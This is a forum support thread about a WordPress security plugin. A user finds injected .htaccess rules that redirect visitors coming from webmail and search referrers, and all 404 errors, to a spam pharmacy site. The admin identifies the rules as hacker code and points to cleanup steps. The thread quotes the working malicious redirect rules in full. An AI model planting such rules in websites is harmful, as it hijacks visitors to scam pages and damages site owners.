hacker redirect htaccess code

Home Forums BulletProof Security Free hacker redirect htaccess code

Viewing 5 posts - 1 through 5 (of 5 total)
  • Author
  • #12780
    Living In Puglia

    I am very confused … when I look at Current Root htaccess file in the Bulletproof control panel all looks good … starts

    #   BULLETPROOF .49.8 >>>>>>> SECURE .HTACCESS
    # If you edit the BULLETPROOF .49.8 >>>>>>> SECURE .HTACCESS text above
    # you will see error messages on the BPS Security Status page
    # BPS is reading the version number in the htaccess file to validate checks
    # If you would like to change what is displayed above you
    # will need to edit the BPS /includes/functions.php file to match your changes
    # If you update your WordPress Permalinks the code between BEGIN WordPress and
    # END WordPress is replaced by WP htaccess code.
    # This removes all of the BPS security code and replaces it with just the default WP htaccess code
    # To restore this file use BPS Restore or activate BulletProof Mode for your Root folder again.
    # BEGIN WordPress
    # IMPORTANT!!! DO NOT DELETE!!! - B E G I N WordPress above or E N D WordPress - text in this file
    # They are reference points for WP, BPS and other plugins to write to this htaccess file.
    # BPS needs to find the - BPSQSE - text string in this file to validate that your security filters exist
    ServerSignature Off
    But when I look at the actual .htaccess file I have
    ErrorDocument 404 http://buyrxcheap24.com/
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*imap.* [OR]
    RewriteCond %{HTTP_REFERER} .*mail* [OR]
    RewriteCond %{HTTP_REFERER} .*inbox* [OR]
    RewriteCond %{HTTP_REFERER} .*search.* [OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
    RewriteCond %{HTTP_REFERER} .*hotmail.* [OR]
    RewriteCond %{HTTP_REFERER} .*gmail.* [OR]
    RewriteCond %{HTTP_REFERER} .*gmx.* [OR]
    RewriteCond %{HTTP_REFERER} .*flickr.*
    RewriteRule ^(.*)$ http://buyrxcheap24.com/ [R=301,L]

    I have tried recreating the htaccess files but get the same result! Totally Confused now

    AITpro Admin

    That htaccess code is not BPS code and is hacker redirect code added by something/someone else.  Your website is already compromised/hacked.  See this Forum Topic link below for what to do next and also the link for the WordPress.org thread post.

    Website already hacked before installing BPS/BPS Pro

    Similar/same hacking method

    Living In Puglia

    Thank you. I’ve been working through the sites and pretty much got back to normal I think. I’m on a shared server with a number of different domains/web sites, some on Joomla and some on WordPress. It’s pretty much looking like the original hack came into one of the Joomla sites!

    AITpro Admin

    We just posted this step by step WordPress hack cleanup/repair Topic since we receive emails very frequently from folks wanting to know if BPS will automatically cleanup a hacked website.  This post/topic was on our “to-do” list so it is now “to-done”.  😉  I think the general idea of the cleanup/repair steps will also work in general for Joomla or other site types.  Obviously there are going to be technical/specific things that are not going to be the same between WordPress and Joomla, but the general approach is probably the best approach to take for website hack cleanup/repair.



    Living In Puglia

    Thanks …. very helpful


Viewing 5 posts - 1 through 5 (of 5 total)
  • You must be logged in to reply to this topic.